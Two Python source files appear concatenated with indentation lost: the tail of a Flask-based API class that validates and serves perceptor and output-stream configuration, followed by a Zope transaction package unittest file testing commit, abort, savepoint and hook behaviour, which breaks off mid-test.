body = self.__get_body()
for name, value in body.items():
try:
self.__validate_and_set_value_for_perceptor_config(
perceptor_name, name, value)
except BaseException:
errors.append(f"Invalid value for config '{name}'")
pass
if len(errors) > 0:
return jsonify(errors), 400
cfgs = []
for config_name in self.__perceptor_config_schema[perceptor_name]:
config_schema = self.__perceptor_config_schema[perceptor_name][config_name]
cfgs.append({
"name": config_name,
"value": self.__perceptor_config_registry[perceptor_name].get(config_name),
"type": config_schema.type,
"description": config_schema.description,
"default_value": config_schema.default_value,
})
return jsonify(cfgs)
def __modify_outputs_config_registry(self) -> Response:
"""
Modifies the outputs config registry.
# Returns
Response: The response.
"""
errors = []
if request.method == "PATCH":
body = self.__get_body()
for output_name, values in body.items():
if output_name not in self.__output_streams:
return Response(
f"output stream with name {output_name} does not exist", status=404)
for name, value in values.items():
try:
self.__validate_and_set_value_for_output_stream_config(
output_name, name, value)
except BaseException:
errors.append(f"Invalid value for config '{name}'")
pass
if len(errors) > 0:
return jsonify(errors), 400
cfgs = {}
for output_name in self.__output_streams:
cfgs[output_name] = []
for config_name in self.__output_config_schema[output_name]:
config_schema = self.__output_config_schema[output_name][config_name]
cfgs[output_name].append({
"name": config_name,
"value": self.__output_config_registry[output_name].get(config_name),
"type": config_schema.type,
"description": config_schema.description,
"default_value": config_schema.default_value,
})
return jsonify(cfgs)
def __modify_output_config_registry(self, **kwargs) -> Response:
"""
Modifies the output config registry.
# Arguments
**kwargs: The keyword arguments.
# Returns
Response: The response.
"""
output_name = kwargs["output_stream"]
if output_name not in self.__output_streams:
return Response(
f"output stream with name {output_name} does not exist", status=404)
errors = []
if request.method == "PATCH":
body = self.__get_body()
for name, value in body.items():
try:
self.__validate_and_set_value_for_output_stream_config(
output_name, name, value)
except BaseException:
errors.append(f"Invalid value for config '{name}'")
pass
if len(errors) > 0:
return jsonify(errors), 400
cfgs = []
for config_name in self.__output_config_schema[output_name]:
config_schema = self.__output_config_schema[output_name][config_name]
cfgs.append({
"name": config_name,
"value": self.__output_config_registry[output_name].get(config_name),
"type": config_schema.type,
"description": config_schema.description,
"default_value": config_schema.default_value,
})
return jsonify(cfgs)
def __create_config_registry_for_output_stream(
self,
name: str,
output_stream: OutputStream,
default_config: dict = None) -> None:
"""
Creates the config registry for an output stream.
# Arguments
name: The name of the output stream.
output_stream: The output stream.
default_config: The default config. Defaults to `None`.
"""
self.__output_config_registry[name] = ConfigRegistry()
output_stream_config_schema = output_stream.get_config_schema()
config_schema_dict = {}
for config_schema in output_stream_config_schema:
validate_type(
config_schema,
Config,
"config_schema must be an instance of Config")
config_schema_dict[config_schema.name] = config_schema
self.__output_config_registry[name].set_value(
config_schema.name, config_schema.default_value)
self.__output_config_schema[name] = config_schema_dict
if default_config is not None:
for config_name, value in default_config.items():
self.__validate_and_set_value_for_output_stream_config(
name, config_name, value)
def __validate_and_set_value_for_output_stream_config(
self, name: str, config_name: str, value: Any) -> None:
"""
Validates and sets the value for an output stream config.
# Arguments
name: The name of the output stream.
config_name: The name of the config.
value: The value.
"""
config_schema_dict = self.__output_config_schema[name]
if config_name not in config_schema_dict:
return
config_schema = config_schema_dict[config_name]
if not config_schema.is_valid(value):
raise ValueError(f"Invalid value for config '{config_name}'")
self.__output_config_registry[name].set_value(config_name, value)
self.__output_streams[name]["stream"].set_config_value(
config_name, value)
def __get_body(self):
"""
Gets the body.
# Returns
dict: The body.
"""
if isinstance(request.json, str):
return json.loads(request.json)
else:
validate_type(request.json, dict, "request body must be a JSON")
return request.json
def __swagger(self) -> Response:
"""
Swagger.
# Returns
Response: The response.
"""
return render_template("swaggerui.html", base_path=self.__path)
def __specs(self) -> Response:
"""
OpenAPI 2.0 specs.
# Returns
Response: The response.
"""
return render_template("openapi.json", base_path=self.__path)
def __set_perception_completion_callback(
self, perception_completion_callback: Callable[[PerceptionObjectModel], None] = None):
"""
Sets the perception completion callback.
# Arguments
perception_completion_callback: The perception completion callback.
"""
if perception_completion_callback is not None:
validate(callable(perception_completion_callback),
"perception_completion_callback must be a function")
self.__perception_completion_callback = perception_completion_callback
|
test__transaction.py | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (c) 2001, 2002, 2005 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE
#
##############################################################################
"""Test transaction behavior for variety of cases.
I wrote these unittests to investigate some odd transaction
behavior when doing unittests of integrating non sub transaction
aware objects, and to insure proper txn behavior. these
tests test the transaction system independent of the rest of the
zodb.
you can see the method calls to a jar by passing the
keyword arg tracing to the modify method of a dataobject.
the value of the arg is a prefix used for tracing print calls
to that objects jar.
the number of times a jar method was called can be inspected
by looking at an attribute of the jar that is the method
name prefixed with a c (count/check).
i've included some tracing examples for tests that i thought
were illuminating as doc strings below.
TODO
add in tests for objects which are modified multiple times,
for example an object that gets modified in multiple sub txns.
"""
import os
import warnings
import unittest
class TransactionTests(unittest.TestCase):
def _getTargetClass(self):
from transaction._transaction import Transaction
return Transaction
def _makeOne(self, synchronizers=None, manager=None):
return self._getTargetClass()(synchronizers, manager)
def test_verifyImplements_ITransaction(self):
from zope.interface.verify import verifyClass
from transaction.interfaces import ITransaction
verifyClass(ITransaction, self._getTargetClass())
def test_verifyProvides_ITransaction(self):
from zope.interface.verify import verifyObject
from transaction.interfaces import ITransaction
verifyObject(ITransaction, self._makeOne())
def test_ctor_defaults(self):
from transaction.weakset import WeakSet
from transaction.tests.common import DummyLogger
from transaction.tests.common import Monkey
from transaction import _transaction
logger = DummyLogger()
with Monkey(_transaction, _LOGGER=logger):
txn = self._makeOne()
self.assertTrue(isinstance(txn._synchronizers, WeakSet))
self.assertEqual(len(txn._synchronizers), 0)
self.assertTrue(txn._manager is None)
self.assertEqual(txn.user, u"")
self.assertEqual(txn.description, u"")
self.assertTrue(txn._savepoint2index is None)
self.assertEqual(txn._savepoint_index, 0)
self.assertEqual(txn._resources, [])
self.assertEqual(txn._adapters, {})
self.assertEqual(txn._voted, {})
self.assertEqual(txn.extension, {})
self.assertTrue(txn._extension is txn.extension) # legacy
self.assertTrue(txn.log is logger)
self.assertEqual(len(logger._log), 1)
self.assertEqual(logger._log[0][0], 'debug')
self.assertEqual(logger._log[0][1], 'new transaction')
self.assertTrue(txn._failure_traceback is None)
self.assertEqual(txn._before_commit, [])
self.assertEqual(txn._after_commit, [])
def test_ctor_w_syncs(self):
from transaction.weakset import WeakSet
synchs = WeakSet()
txn = self._makeOne(synchronizers=synchs)
self.assertTrue(txn._synchronizers is synchs)
def test_isDoomed(self):
from transaction._transaction import Status
txn = self._makeOne()
self.assertFalse(txn.isDoomed())
txn.status = Status.DOOMED
self.assertTrue(txn.isDoomed())
def test_doom_active(self):
from transaction._transaction import Status
txn = self._makeOne()
txn.doom()
self.assertTrue(txn.isDoomed())
self.assertEqual(txn.status, Status.DOOMED)
def test_doom_invalid(self):
from transaction._transaction import Status
txn = self._makeOne()
for status in Status.COMMITTING, Status.COMMITTED, Status.COMMITFAILED:
txn.status = status
self.assertRaises(ValueError, txn.doom)
def test_doom_already_doomed(self):
from transaction._transaction import Status
txn = self._makeOne()
txn.status = Status.DOOMED
txn.doom()
self.assertTrue(txn.isDoomed())
self.assertEqual(txn.status, Status.DOOMED)
def test__prior_operation_failed(self):
from transaction.interfaces import TransactionFailedError
from transaction.tests.common import assertRaisesEx
class _Traceback(object):
def getvalue(self):
return 'TRACEBACK'
txn = self._makeOne()
txn._failure_traceback = _Traceback()
err = assertRaisesEx(TransactionFailedError,
txn._prior_operation_failed)
self.assertTrue(str(err).startswith('An operation previously failed'))
self.assertTrue(str(err).endswith( "with traceback:\n\nTRACEBACK"))
def test_join_COMMITFAILED(self):
from transaction.interfaces import TransactionFailedError
from transaction._transaction import Status
class _Traceback(object):
def getvalue(self):
return 'TRACEBACK'
txn = self._makeOne()
txn.status = Status.COMMITFAILED
txn._failure_traceback = _Traceback()
self.assertRaises(TransactionFailedError, txn.join, object())
def test_join_COMMITTING(self):
from transaction._transaction import Status
txn = self._makeOne()
txn.status = Status.COMMITTING
self.assertRaises(ValueError, txn.join, object())
def test_join_COMMITTED(self):
from transaction._transaction import Status
txn = self._makeOne()
txn.status = Status.COMMITTED
self.assertRaises(ValueError, txn.join, object())
def test_join_DOOMED_non_preparing_wo_sp2index(self):
from transaction._transaction import Status
txn = self._makeOne()
txn.status = Status.DOOMED
resource = object()
txn.join(resource)
self.assertEqual(txn._resources, [resource])
def test_join_ACTIVE_w_preparing_w_sp2index(self):
from transaction._transaction import AbortSavepoint
from transaction._transaction import DataManagerAdapter
class _TSP(object):
def __init__(self):
self._savepoints = []
class _DM(object):
def prepare(self):
pass
txn = self._makeOne()
tsp = _TSP()
txn._savepoint2index = {tsp: object()}
dm = _DM
txn.join(dm)
self.assertEqual(len(txn._resources), 1)
dma = txn._resources[0]
self.assertTrue(isinstance(dma, DataManagerAdapter))
self.assertTrue(txn._resources[0]._datamanager is dm)
self.assertEqual(len(tsp._savepoints), 1)
self.assertTrue(isinstance(tsp._savepoints[0], AbortSavepoint))
self.assertTrue(tsp._savepoints[0].datamanager is dma)
self.assertTrue(tsp._savepoints[0].transaction is txn)
def test__unjoin_miss(self):
txn = self._makeOne()
txn._unjoin(object()) #no raise
def test__unjoin_hit(self):
txn = self._makeOne()
resource = object()
txn._resources.append(resource)
txn._unjoin(resource)
self.assertEqual(txn._resources, [])
def test_savepoint_COMMITFAILED(self):
from transaction.interfaces import TransactionFailedError
from transaction._transaction import Status
class _Traceback(object):
def getvalue(self):
return 'TRACEBACK'
txn = self._makeOne()
txn.status = Status.COMMITFAILED
txn._failure_traceback = _Traceback()
self.assertRaises(TransactionFailedError, txn.savepoint)
def test_savepoint_empty(self):
from weakref import WeakKeyDictionary
from transaction import _transaction
from transaction._transaction import Savepoint
from transaction.tests.common import DummyLogger
from transaction.tests.common import Monkey
logger = DummyLogger()
with Monkey(_transaction, _LOGGER=logger):
txn = self._makeOne()
sp = txn.savepoint()
self.assertTrue(isinstance(sp, Savepoint))
self.assertTrue(sp.transaction is txn)
self.assertEqual(sp._savepoints, [])
self.assertEqual(txn._savepoint_index, 1)
self.assertTrue(isinstance(txn._savepoint2index, WeakKeyDictionary))
self.assertEqual(txn._savepoint2index[sp], 1)
def test_savepoint_non_optimistc_resource_wo_support(self):
from transaction import _transaction
from transaction._transaction import Status
from transaction._compat import StringIO
from transaction.tests.common import DummyLogger
from transaction.tests.common import Monkey
logger = DummyLogger()
with Monkey(_transaction, _LOGGER=logger):
txn = self._makeOne()
logger._clear()
resource = object()
txn._resources.append(resource)
self.assertRaises(TypeError, txn.savepoint)
self.assertEqual(txn.status, Status.COMMITFAILED)
self.assertTrue(isinstance(txn._failure_traceback, StringIO))
self.assertTrue('TypeError' in txn._failure_traceback.getvalue())
self.assertEqual(len(logger._log), 2)
self.assertEqual(logger._log[0][0], 'error')
self.assertTrue(logger._log[0][1].startswith('Error in abort'))
self.assertEqual(logger._log[1][0], 'error')
self.assertTrue(logger._log[1][1].startswith('Error in tpc_abort'))
def test__remove_and_invalidate_after_miss(self):
from weakref import WeakKeyDictionary
txn = self._makeOne()
txn._savepoint2index = WeakKeyDictionary()
class _SP(object):
def __init__(self, txn):
self.transaction = txn
holdme = []
for i in range(10):
sp = _SP(txn)
holdme.append(sp) #prevent gc
txn._savepoint2index[sp] = i
self.assertEqual(len(txn._savepoint2index), 10)
self.assertRaises(KeyError, txn._remove_and_invalidate_after, _SP(txn))
self.assertEqual(len(txn._savepoint2index), 10)
def test__remove_and_invalidate_after_hit(self):
from weakref import WeakKeyDictionary
txn = self._makeOne()
txn._savepoint2index = WeakKeyDictionary()
class _SP(object):
def __init__(self, txn, index):
self.transaction = txn
self._index = index
def __lt__(self, other):
return self._index < other._index
def __repr__(self):
return '_SP: %d' % self._index
holdme = []
for i in range(10):
sp = _SP(txn, i)
holdme.append(sp) #prevent gc
txn._savepoint2index[sp] = i
self.assertEqual(len(txn._savepoint2index), 10)
txn._remove_and_invalidate_after(holdme[1])
self.assertEqual(sorted(txn._savepoint2index), sorted(holdme[:2]))
def test__invalidate_all_savepoints(self):
from weakref import WeakKeyDictionary
txn = self._makeOne()
txn._savepoint2index = WeakKeyDictionary()
class _SP(object):
def __init__(self, txn, index):
self.transaction = txn
self._index = index
def __repr__(self):
return '_SP: %d' % self._index
holdme = []
for i in range(10):
sp = _SP(txn, i)
holdme.append(sp) #prevent gc
txn._savepoint2index[sp] = i
self.assertEqual(len(txn._savepoint2index), 10)
txn._invalidate_all_savepoints()
self.assertEqual(list(txn._savepoint2index), [])
def test_register_wo_jar(self):
class _Dummy(object):
_p_jar = None
txn = self._makeOne()
self.assertRaises(ValueError, txn.register, _Dummy())
def test_register_w_jar(self):
class _Manager(object):
pass
mgr = _Manager()
class _Dummy(object):
_p_jar = mgr
txn = self._makeOne()
dummy = _Dummy()
txn.register(dummy)
resources = list(txn._resources)
self.assertEqual(len(resources), 1)
adapter = resources[0]
self.assertTrue(adapter.manager is mgr)
self.assertTrue(dummy in adapter.objects)
items = list(txn._adapters.items())
self.assertEqual(len(items), 1)
self.assertTrue(items[0][0] is mgr)
self.assertTrue(items[0][1] is adapter)
def test_register_w_jar_already_adapted(self):
class _Adapter(object):
def __init__(self):
self.objects = []
class _Manager(object):
pass
mgr = _Manager()
class _Dummy(object):
_p_jar = mgr
txn = self._makeOne()
txn._adapters[mgr] = adapter = _Adapter()
dummy = _Dummy()
txn.register(dummy)
self.assertTrue(dummy in adapter.objects)
def test_commit_DOOMED(self):
from transaction.interfaces import DoomedTransaction
from transaction._transaction import Status
txn = self._makeOne()
txn.status = Status.DOOMED
self.assertRaises(DoomedTransaction, txn.commit)
def test_commit_COMMITFAILED(self):
from transaction._transaction import Status
from transaction.interfaces import TransactionFailedError
class _Traceback(object):
def getvalue(self):
return 'TRACEBACK'
txn = self._makeOne()
txn.status = Status.COMMITFAILED
txn._failure_traceback = _Traceback()
self.assertRaises(TransactionFailedError, txn.commit)
def test_commit_wo_savepoints_wo_hooks_wo_synchronizers(self):
from transaction._transaction import Status
from transaction.tests.common import DummyLogger
from transaction.tests.common import Monkey
from transaction import _transaction
class _Mgr(object):
def __init__(self, txn):
self._txn = txn
def free(self, txn):
assert txn is self._txn
self._txn = None
logger = DummyLogger()
with Monkey(_transaction, _LOGGER=logger):
txn = self._makeOne()
logger._clear()
mgr = txn._manager = _Mgr(txn)
txn.commit()
self.assertEqual(txn.status, Status.COMMITTED)
self.assertTrue(mgr._txn is None)
self.assertEqual(logger._log[0][0], 'debug')
self.assertEqual(logger._log[0][1], 'commit')
def test_commit_w_savepoints(self):
from weakref import WeakKeyDictionary
from transaction.tests.common import DummyLogger
from transaction.tests.common import Monkey
from transaction import _transaction
class _SP(object):
def __init__(self, txn, index):
self.transaction = txn
self._index = index
def __repr__(self):
return '_SP: %d' % self._index
logger = DummyLogger()
with Monkey(_transaction, _LOGGER=logger):
txn = self._makeOne()
txn._savepoint2index = WeakKeyDictionary()
holdme = []
for i in range(10):
sp = _SP(txn, i)
holdme.append(sp) #prevent gc
txn._savepoint2index[sp] = i
logger._clear()
txn.commit()
self.assertEqual(list(txn._savepoint2index), [])
def test_commit_w_beforeCommitHooks(self):
from transaction.tests.common import DummyLogger
from transaction.tests.common import Monkey
from transaction import _transaction
_hooked1, _hooked2 = [], []
def _hook1(*args, **kw):
_hooked1.append((args, kw))
def _hook2(*args, **kw):
_hooked2.append((args, kw))
logger = DummyLogger()
with Monkey(_transaction, _LOGGER=logger):
txn = self._makeOne()
txn._before_commit.append((_hook1, ('one',), {'uno': 1}))
txn._before_commit.append((_hook2, (), {}))
logger._clear()
txn.commit()
self.assertEqual(_hooked1, [(('one',), {'uno': 1})])
self.assertEqual(_hooked2, [((), {})])
self.assertEqual(txn._before_commit, [])
def test_commit_w_synchronizers(self):
from transaction.weakset import WeakSet
from transaction.tests.common import DummyLogger
from transaction.tests.common import Monkey
from transaction import _transaction
class _Synch(object):
_before = _after = False
def beforeCompletion(self, txn):
self._before = txn
def afterCompletion(self, txn):
self._after = txn
synchs = [_Synch(), _Synch(), _Synch()]
ws = WeakSet()
for synch in synchs:
ws.add(synch)
logger = DummyLogger()
with Monkey(_transaction, _LOGGER=logger):
txn = self._makeOne(synchronizers=ws)
logger._clear()
txn.commit()
for synch in synchs:
self.assertTrue(synch._before is txn)
self.assertTrue(synch._after is txn)
def test_commit_w_afterCommitHooks(self):
from transaction.tests.common import DummyLogger
from transaction.tests.common import Monkey
from transaction import _transaction
_hooked1, _hooked2 = [], []
def _hook1(*args, **kw):
_hooked1.append((args, kw))
def _hook2(*args, **kw):
_hooked2.append((args, kw))
logger = DummyLogger()
with Monkey(_transaction, _LOGGER=logger):
txn = self._makeOne()
txn._after_commit.append((_hook1, ('one',), {'uno': 1}))
txn._after_commit.append((_hook2, (), {}))
logger._clear()
txn.commit()
self.assertEqual(_hooked1, [((True, 'one',), {'uno': 1})])
self.assertEqual(_hooked2, [((True,), {})])
self.assertEqual(txn._after_commit, [])
self.assertEqual(txn._resources, [])
def test_commit_error_w_afterCompleteHooks(self):
from transaction import _transaction
from transaction.tests.common import DummyLogger
from transaction.tests.common import Monkey
class BrokenResource(object):
def sortKey(self):
return 'zzz'
def tpc_begin(self, txn):
raise ValueError('test')
broken = BrokenResource()
resource = Resource('aaa')
_hooked1, _hooked2 = [], []
def _hook1(*args, **kw):
_hooked1.append((args, kw))
def _hook2(*args, **kw):
_hooked2.append((args, kw))
logger = DummyLogger()
with Monkey(_transaction, _LOGGER=logger):
txn = self._makeOne()
txn._after_commit.append((_hook1, ('one',), {'uno': 1}))
txn._after_commit.append((_hook2, (), {}))
txn._resources.append(broken)
txn._resources.append(resource)
logger._clear()
self.assertRaises(ValueError, txn.commit)
self.assertEqual(_hooked1, [((False, 'one',), {'uno': 1})])
self.assertEqual(_hooked2, [((False,), {})])
self.assertEqual(txn._after_commit, [])
self.assertTrue(resource._b)
self.assertFalse(resource._c)
self.assertFalse(resource._v)
self.assertFalse(resource._f)
self.assertTrue(resource._a)
self.assertTrue(resource._x)
def test_commit_error_w_synchronizers(self):
from transaction.weakset import WeakSet
from transaction.tests.common import DummyLogger
from transaction.tests.common import Monkey
from transaction import _transaction
class _Synch(object):
_before = _after = False
def beforeCompletion(self, txn):
self._before = txn
def afterCompletion(self, txn):
self._after = txn
synchs = [_Synch(), _Synch(), _Synch()]
ws = WeakSet()
for synch in synchs:
ws.add(synch)
class BrokenResource(object):
def sortKey(self):
return 'zzz'
def tpc_begin(self, txn):
raise ValueError('test')
broken = BrokenResource()
logger = DummyLogger()
with Monkey(_transaction, _LOGGER=logger):
txn = self._makeOne(synchronizers=ws)
logger._clear()
txn._resources.append(broken)
self.assertRaises(ValueError, txn.commit)
for synch in synchs:
self.assertTrue(synch._before is txn)
self.assertTrue(synch._after is txn) #called in _cleanup
def test_commit_clears_resources(self):
class DM(object):
tpc_begin = commit = tpc_finish = tpc_vote = lambda s, txn: True
dm = DM()
txn = self._makeOne()
txn.join(dm)
self.assertEqual(txn._resources, [dm])
txn.commit()
self.assertEqual(txn._resources, [])
def test_getBeforeCommitHooks_empty(self):
txn = self._makeOne()
self.assertEqual(list(txn.getBeforeCommitHooks()), [])
def test_addBeforeCommitHook(self):
def _hook(*args, **kw):
pass
txn = self._makeOne()
txn.addBeforeCommitHook(_hook, ('one',), dict(uno=1))
self.assertEqual(list(txn.getBeforeCommitHooks()),
[(_hook, ('one',), {'uno': 1})])
def test_addBeforeCommitHook_w_kws(self):
def _hook(*args, **kw):
pass
txn = self._makeOne()
txn.addBeforeCommitHook(_hook, ('one',))
self.assertEqual(list(txn.getBeforeCommitHooks()),
[(_hook, ('one',), {})])
def test_getAfterCommitHooks_empty(self):
txn = self._makeOne()
self.assertEqual(list(txn.getAfterCommitHooks()), [])
def test_addAfterCommitHook(self):
def _hook(*args, **kw):
pass
txn = self._makeOne()
txn.addAfterCommitHook(_hook, ('one',), dict(uno=1))
self.assertEqual(list(txn.getAfterCommitHooks()),
[(_hook, ('one',), {'uno': 1})])
def test_addAfterCommitHook_wo_kws(self):
def _hook(*args, **kw):
pass
txn = self._makeOne()
txn.addAfterCommitHook(_hook, ('one',))
self.assertEqual(list(txn.getAfterCommitHooks()),
[(_hook, ('one',), {})])
def test_callAfterCommitHook_w_error(self):
from transaction.tests.common import DummyLogger
from transaction.tests.common import Monkey
from transaction import _transaction
_hooked2 = []
def _hook1(*args, **kw):
raise ValueError()
def _hook2(*args, **kw):
_hooked2.append((args, kw))
logger = DummyLogger()
with Monkey(_transaction, _LOGGER=logger):
txn = self._makeOne()
logger._clear()
txn.addAfterCommitHook(_hook1, ('one',))
txn.addAfterCommitHook(_hook2, ('two',), dict(dos=2))
txn._callAfterCommitHooks()
# second hook gets called even if first raises
self.assertEqual(_hooked2, [((True, 'two',), {'dos': 2})])
self.assertEqual(len(logger._log), 1)
self.assertEqual(logger._log[0][0], 'error')
self.assertTrue(logger._log[0][1].startswith(
"Error in after commit hook"))
def test_callAfterCommitHook_w_abort(self):
from transaction.tests.common import DummyLogger
from transaction.tests.common import Monkey
from transaction import _transaction
_hooked2 = []
def _hook1(*args, **kw):
raise ValueError()
def _hook2(*args, **kw):
_hooked2.append((args, kw))
logger = DummyLogger()
with Monkey(_transaction, _LOGGER=logger):
txn = self._makeOne()
logger._clear()
txn.addAfterCommitHook(_hook1, ('one',))
txn.addAfterCommitHook(_hook2, ('two',), dict(dos=2))
txn._callAfterCommitHooks()
self.assertEqual(logger._log[0][0], 'error')
self.assertTrue(logger._log[0][1].startswith(
"Error in after commit hook"))
def test__commitResources_normal(self):
from transaction.tests.common import DummyLogger
from transaction.tests.common import Monkey
from transaction import _transaction
resources = [Resource('bbb'), Resource('aaa')]
logger = DummyLogger()
with Monkey(_transaction, _LOGGER=logger):
txn = self._makeOne()
logger._clear()
txn._resources.extend(resources)
txn._commitResources()
self.assertEqual(len(txn._voted), 2)
for r in resources:
self.assertTrue(r._b and r._c and r._v and r._f)
self.assertFalse(r._a and r._x)
self.assertTrue(id(r) in txn._voted)
self.assertEqual(len(logger._log), 2)
self.assertEqual(logger._log[0][0], 'debug')
self.assertEqual(logger._log[0][1], 'commit Resource: aaa')
self.assertEqual(logger._log[1][0], 'debug')
self.assertEqual(logger._log[1][1], 'commit Resource: bbb')
def test__commitResources_error_in_tpc_begin(self):
from transaction.tests.common import DummyLogger
from transaction.tests.common import Monkey
from transaction import _transaction
resources = [Resource('bbb', 'tpc_begin'), Resource('aaa')]
logger = DummyLogger()
with Monkey(_transaction, _LOGGER=logger):
txn = self._makeOne()
logger._clear()
txn._resources.extend(resources)
self.assertRaises(ValueError, txn._commitResources)
for r in resources:
if r._key == 'aaa':
self.assertTrue(r._b)
else:
self.assertFalse(r._b)
self.assertFalse(r._c and r._v and r._f)
self.assertTrue(r._a and r._x)
self.assertEqual(len(logger._log), 0)
def test__commitResources_error_in_afterCompletion(self):
from transaction.tests.common import DummyLogger
from transaction.tests.common import Monkey
from transaction import _transaction
class _Synchrnonizers(object):
def __init__(self, res):
self._res = res
def map(self, func):
for res in self._res:
func(res)
resources = [Resource('bbb', 'tpc_begin'),
Resource('aaa', 'afterCompletion')]
sync = _Synchrnonizers(resources)
logger = DummyLogger()
with Monkey(_transaction, _LOGGER=logger):
txn = self._makeOne(sync)
logger._clear()
txn._resources.extend(resources)
self.assertRaises(ValueError, txn._commitResources)
for r in resources:
if r._key == 'aaa':
self.assertTrue(r._b)
else:
self.assertFalse(r._b)
self.assertFalse(r._c and r._v and r._f)
self.assertTrue(r._a and r._x)
self.assertEqual(len(logger._log), 0)
self.assertTrue(resources[0]._after)
self.assertFalse(resources[1]._after)
def test__commitResources_error_in_commit(self):
from transaction.tests.common import DummyLogger
from transaction.tests.common import Monkey
from transaction import _transaction
resources = [Resource('bbb', 'commit'), Resource('aaa')]
logger = DummyLogger()
with Monkey(_transaction, _LOGGER=logger):
txn = self._makeOne()
logger._clear()
txn._resources.extend(resources)
self.assertRaises(ValueError, txn._commitResources)
for r in resources:
self.assertTrue(r._b)
if r._key == 'aaa':
self.assertTrue(r._c)
else:
self.assertFalse(r._c)
self.assertFalse(r._v and r._f)
self.assertTrue(r._a and r._x)
self.assertEqual(len(logger._log), 1)
self.assertEqual(logger._log[0][0], 'debug')
self.assertEqual(logger._log[0][1], 'commit Resource: aaa')
def test__commitResources_error_in_tpc_vote(self):
from transaction.tests.common import DummyLogger
from transaction.tests.common import Monkey
from transaction import _transaction
resources = [Resource('bbb', 'tpc_vote'), Resource('aaa')]
logger = DummyLogger()
with Monkey(_transaction, _LOGGER=logger):
txn = self._makeOne()
logger._clear()
txn._resources.extend(resources)
self.assertRaises(ValueError, txn._commitResources)
self.assertEqual(len(txn._voted), 1)
for r in resources:
self.assertTrue(r._b and r._c)
if r._key == 'aaa':
self.assertTrue(id(r) in txn._voted)
self.assertTrue(r._v)
self.assertFalse(r._f)
self.assertFalse(r._a)
self.assertTrue(r._x)
else:
self.assertFalse(id(r) in txn._voted)
self.assertFalse(r._v)
self.assertFalse(r._f)
self.assertTrue(r._a and r._x)
self.assertEqual(len(logger._log), 2)
self.assertEqual(logger._log[0][0], 'debug')
self.assertEqual(logger._log[0][1], 'commit Resource: aaa')
self.assertEqual(logger._log[1][0], 'debug')
self.assertEqual(logger._log[1][1], 'commit Resource: bbb')
def test__commitResources_error_in_tpc_finish(self):
from transaction.tests.common import DummyLogger
from transaction.tests.common import Monkey
from transaction import _transaction
resources = [Resource('bbb', 'tpc_finish'), Resource('aaa')]
logger = DummyLogger()
with Monkey(_transaction, _LOGGER=logger):
txn = self._makeOne()
logger._clear()
txn._resources.extend(resources)
self.assertRaises(ValueError, txn._commitResources)
for r in resources:
self.assertTrue(r._b and r._c and r._v)
self.assertTrue(id(r) in txn._voted)
if r._key == 'aaa':
self.assertTrue(r._f)
else:
self.assertFalse(r._f)
self.assertFalse(r._a and r._x) #no cleanup if tpc_finish raises
self.assertEqual(len(logger._log), 3)
self.assertEqual(logger._log[0][0], 'debug')
self.assertEqual(logger._log[0][1], 'commit Resource: aaa')
self.assertEqual(logger._log[1][0], 'debug')
self.assertEqual(logger._log[1][1], 'commit Resource: bbb')
self.assertEqual(logger._log[2][0], 'critical')
self.assertTrue(logger._log[2][1].startswith(
'A storage error occurred'))
def test_abort_wo_savepoints_wo_hooks_wo_synchronizers(self):
from transaction._transaction import Status
from transaction.tests.common import DummyLogger
from transaction.tests.common import Monkey
from transaction import _transaction
class _Mgr(object):
def __init__(self, txn):
self._txn = txn
def free(self, txn):
assert txn is self._txn
self._txn = None
logger = DummyLogger()
with Monkey(_transaction, _LOGGER=logger):
txn = self._makeOne()
logger._clear()
mgr = txn._manager = _Mgr(txn)
txn.abort()
self.assertEqual(txn.status, Status.ACTIVE)
self.assertTrue(mgr._txn is None)
self.assertEqual(logger._log[0][0], 'debug')
self.assertEqual(logger._log[0][1], 'abort')
def test_abort_w_savepoints(self):
from weakref import WeakKeyDictionary
from transaction.tests.common import DummyLogger
from transaction.tests.common import Monkey
from transaction import _transaction
class _SP(object):
def __init__(self, txn, index):
self.transaction = txn
self._index = index
def __repr__(self):
return '_SP: %d' % self._index
logger = DummyLogger()
with Monkey(_transaction, _LOGGER=logger):
txn = self._makeOne()
txn._savepoint2index = WeakKeyDictionary()
holdme = []
for i in range(10):
sp = _SP(txn, i)
holdme.append(sp) #prevent gc
txn._savepoint2index[sp] = i
logger._clear()
txn.abort()
self.assertEqual(list(txn._savepoint2index), [])
def test_abort_w_beforeCommitHooks(self):
from transaction.tests.common import DummyLogger
from transaction.tests.common import Monkey
from transaction import _transaction
_hooked1, _hooked2 = [], []
def _hook1(*args, **kw):
_hooked1.append((args, kw))
def _hook2(*args, **kw):
_hooked2.append((args, kw))
logger = DummyLogger()
with Monkey(_transaction, _LOGGER=logger):
txn = self._makeOne()
txn._before_commit.append((_hook1, ('one',), {'uno': 1}))
txn._before_commit.append((_hook2, (), {}))
logger._clear()
txn.abort()
self.assertEqual(_hooked1, [])
self.assertEqual(_hooked2, [])
# Hooks are neither called nor cleared on abort
self.assertEqual(list(txn.getBeforeCommitHooks()),
[(_hook1, ('one',), {'uno': 1}), (_hook2, (), {})])
def test_abort_w_synchronizers(self):
from transaction.weakset import WeakSet
from transaction.tests.common import DummyLogger
from transaction.tests.common import Monkey
from transaction import _transaction
class _Synch(object):
_before = _after = False
def beforeCompletion(self, txn):
self._before = txn
def afterCompletion(self, txn):
self._after = txn
synchs = [_Synch(), _Synch(), _Synch()]
ws = WeakSet()
for synch in synchs:
ws.add(synch)
logger = DummyLogger()
with Monkey(_transaction, _LOGGER=logger):
txn = self._makeOne(synchronizers=ws)
logger._clear()
txn.abort()
for synch in synchs:
self.assertTrue(synch._before is txn)
self.assertTrue(synch._after is txn)
def test_abort_w_afterCommitHooks(self):
from transaction.tests.common import DummyLogger
from transaction.tests.common import Monkey
from transaction import _transaction
_hooked1, _hooked2 = [], []
def _hook1(*args, **kw):
_hooked1.append((args, kw))
def _hook2(*args, **kw):
_hooked2.append((args, kw))
logger = DummyLogger()
with Monkey(_transaction, _LOGGER=logger):
txn = self._makeOne()
txn._after_commit.append((_hook1, ('one',), {'uno': 1}))
txn._after_commit.append((_hook2, (), {}))
logger._clear()
txn.abort()
# Hooks are neither called nor cleared on abort
